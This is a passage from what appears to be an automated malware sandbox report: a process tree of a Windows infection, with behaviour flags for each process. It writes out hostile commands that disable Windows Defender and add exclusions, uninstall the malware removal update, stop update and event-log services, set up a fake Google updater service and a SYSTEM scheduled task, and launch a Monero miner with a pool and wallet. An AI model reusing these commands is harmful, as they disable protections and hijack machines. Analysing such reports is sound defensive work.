        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4988
        
        C:\Users\Admin\Pictures\pjGjQPhLGvu2xHuMA86i08A7.exe
        
        "C:\Users\Admin\Pictures\pjGjQPhLGvu2xHuMA86i08A7.exe"
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:3988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 720
        10⤵
        Program crash
        
        PID:1936
        
        C:\Users\Admin\Pictures\y4jvp2Pqh1XudXwrcFu7KGFu.exe
        
        "C:\Users\Admin\Pictures\y4jvp2Pqh1XudXwrcFu7KGFu.exe" /s
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:392
        
        C:\Users\Admin\Pictures\360TS_Setup.exe
        
        "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s
        9⤵
        
        PID:4564
        
        C:\Program Files (x86)\1715714421_0\360TS_Setup.exe
        
        "C:\Program Files (x86)\1715714421_0\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s /TSinstall
        10⤵
        
        PID:4400
        
        C:\Users\Admin\Pictures\DDELkA2CYWL1k1yyRwEvNc2K.exe
        
        "C:\Users\Admin\Pictures\DDELkA2CYWL1k1yyRwEvNc2K.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2396
        
        C:\Users\Admin\Pictures\DDELkA2CYWL1k1yyRwEvNc2K.exe
        
        "C:\Users\Admin\Pictures\DDELkA2CYWL1k1yyRwEvNc2K.exe"
        9⤵
        Executes dropped EXE
        
        PID:1512
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 352
        10⤵
        Program crash
        
        PID:5228
        
        C:\Users\Admin\Pictures\Qq4Ok37f7DuRaKGoBsapXTNa.exe
        
        "C:\Users\Admin\Pictures\Qq4Ok37f7DuRaKGoBsapXTNa.exe"
        8⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1856
        
        C:\Users\Admin\Pictures\jMyhPtVcRAJsACUjhznK7pX6.exe
        
        "C:\Users\Admin\Pictures\jMyhPtVcRAJsACUjhznK7pX6.exe"
        8⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\7zS654D.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        9⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:4612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        11⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:3128
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        13⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        11⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:1140
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        13⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        11⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:4720
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        13⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        11⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3768
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        13⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        11⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
        
        C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2732" "2144" "2108" "2148" "0" "0" "2152" "0" "0" "0" "0" "0"
        14⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2172
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2744
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS654D.tmp\Install.exe\" it /XMididbuyV 385118 /S" /V1 /F
        10⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5748
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        10⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:4984
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        12⤵
        
        PID:4780
        
        C:\Users\Admin\Pictures\H4BNchM4cj1N1IgIZEnDis9F.exe
        
        "C:\Users\Admin\Pictures\H4BNchM4cj1N1IgIZEnDis9F.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4956
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:2232
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        10⤵
        
        PID:5108
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:5816
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:1596
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:2452
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        9⤵
        Launches sc.exe
        
        PID:396
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        9⤵
        Launches sc.exe
        
        PID:2668
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        9⤵
        
        PID:1140
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        9⤵
        
        PID:4720
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        9⤵
        
        PID:4776
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        9⤵
        
        PID:4616
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        9⤵
        
        PID:6100
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        9⤵
        Launches sc.exe
        
        PID:1716
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        9⤵
        Launches sc.exe
        
        PID:756
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        9⤵
        Launches sc.exe
        
        PID:5064
        
        C:\Users\Admin\Pictures\nWY7Ky3NpQuuuYVIUAh2TeN7.exe
        
        "C:\Users\Admin\Pictures\nWY7Ky3NpQuuuYVIUAh2TeN7.exe"
        8⤵
        Executes dropped EXE
        
        PID:3024
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        7⤵
        
        PID:408
- - C:\Users\Admin\1000006002\c5f9bf7662.exe
    "C:\Users\Admin\1000006002\c5f9bf7662.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5832 -ip 5832
1⤵
PID:4856

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1784
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3692
- - C:\Windows\Temp\828948.exe
    "C:\Windows\Temp\828948.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5604

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:4016
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3660 -ip 3660
1⤵
PID:2364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3660 -ip 3660
1⤵
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2436 -ip 2436
1⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3660 -ip 3660
1⤵
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3660 -ip 3660
1⤵
PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3660 -ip 3660
1⤵
PID:2056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3660 -ip 3660
1⤵
PID:2924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3660 -ip 3660
1⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3660 -ip 3660
1⤵
PID:4032

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:5268
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:2260
- - C:\Windows\Temp\501115.exe
    "C:\Windows\Temp\501115.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:4700

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4108

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4332

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4660 -ip 4660
1⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4660 -ip 4660
1⤵
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4660 -ip 4660
1⤵
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4660 -ip 4660
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4660 -ip 4660
1⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4660 -ip 4660
1⤵
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4660 -ip 4660
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4660 -ip 4660
1⤵
PID:2108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4660 -ip 4660
1⤵
PID:4604

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4780
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:5824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5276
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5440
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5424
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4564
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2144
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5716
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4032
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1504
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3612
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    PID:3776
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5656
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2060
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4592
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:5468
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      PID:2160
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5724
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1000
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6096
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5400
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:3812
  - - C:\Windows\system32\wermgr.exe
      "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3812" "1836" "1692" "1840" "0" "0" "1844" "0" "0" "0" "0" "0"
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      PID:2568
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    PID:5676
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:1320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3884
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6060
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2288
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4948
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      PID:2968
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2748
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5820
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:4332
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3204
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5940
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:2324
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:5664
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    PID:5024
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:4144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3540
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4320
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:5440
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4056
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      PID:4500
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3768
  - - C:\Windows\system32\sc.exe
